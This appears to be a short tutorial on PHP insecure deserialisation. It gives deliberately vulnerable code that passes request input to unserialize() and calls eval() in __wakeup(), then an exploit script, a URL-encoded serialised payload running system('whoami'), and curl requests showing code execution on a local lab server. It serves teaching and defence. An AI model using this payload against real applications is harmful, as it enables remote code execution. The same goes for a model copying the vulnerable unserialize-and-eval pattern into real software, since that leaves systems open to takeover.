Introduction

First of all, let's explain what serialisation and deserialisation mean. The serialisation of an object transforms an object from Object Programming languages such as Java, Python or PHP into a format that can be stored or transferred. Deserailsation turns serialised objects from files or the network into ordinary programming objects.

An attacker could manipulate serialised objects to change the application's logic, perform a denial service, or execute arbitrary code when deserialised.

Proof of Concept

When you control a serialised object that is passed into unserialised(), you can control the properties of the created object. You might also be able to hijack the flow of the application by controlling the values passed into automatically executed methods like __wakeup(), or __destruct().

In this Proof of concept, the vulnerable code receives a serialised object through the GET parameter r, then unserialises it into an array, printing the first two values. However, an attacker could create its own inject variable, which value will be executed by the function eval just after the unserialize function was performed due to the function __ wakeup().

Vulnerable code:

<?php 
    class PHPObjectInjection{
        public $inject;
        function __construct(){
        }
        function __wakeup(){
            if(isset($this->inject)){
                eval($this->inject);
            }
        }
    }
    if(isset($_REQUEST['r'])){  
        $var1=unserialize($_REQUEST['r']);
        if(is_array($var1)){
            echo "<br/>".$var1[0]." - ".$var1[1];
        }
    }
    else{
        echo ""; # nothing happens here
    }
?> 

php -S localhost:8080 vuln.php

Exploit :

<?php 
    class PHPObjectInjection{
        public $inject = "system('whoami');";
    }
    echo urlencode(serialize(array("vul","nerable"))); # Basic serialized data
    echo "\n";
    echo urlencode(serialize(new PHPObjectInjection)); # Command execution (__wakeup)
?>

php exploit.php
# Intended use
a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D 
# Malicious use
O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D

Result:

As you can see below, because the attacker could replace the $inject variable with the command "whoami", the attacker gained RCE knowing the user who executed the PHP service.

curl http://localhost:8080?r=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D
vul - nerable
curl http://localhost:8080?r=O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D
kali

References

• Several exploits [PayloadAllTheThings]

• PHP Object Injection [OWASP]

• Exploiting PHP deserialization [Medium]

• Deserialization Cheat Sheet

• Exploiting insecure deserialization vulnerabilities

• Magic methods

• What is Phar Deserialization